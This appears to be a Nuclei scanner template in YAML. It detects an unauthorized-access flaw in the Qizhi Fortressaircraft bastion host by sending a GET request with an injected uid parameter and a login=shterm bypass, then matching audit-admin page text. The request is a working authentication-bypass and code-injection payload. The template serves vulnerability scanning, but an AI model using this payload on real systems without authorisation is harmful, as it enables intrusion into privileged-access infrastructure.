32 lines
980 B
YAML
32 lines
980 B
YAML
id: qizhi-fortressaircraft-unauth
|
|
|
|
info:
|
|
name: Qizhi Fortressaircraft Unauthorized Access
|
|
author: ritikchaddha
|
|
severity: high
|
|
description: Qizhi Fortressaircraft is vulnerable to Unauthorized Access.
|
|
reference:
|
|
- https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw
|
|
metadata:
|
|
max-request: 1
|
|
tags: qizhi,fortressaircraft,unauth
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "错误的id"
|
|
- "审计管理员"
|
|
- "事件审计"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502200789f4e9e13a9eb2f2d170cf9a162ce4af9410ba9f2b40e71c2069e4f2da9321022100b6e81ad5e4ee3e483469604da1de8451348bb3909e8d1e3dc821f35533252eeb:922c64590222798bb761d5b6d8e72950 |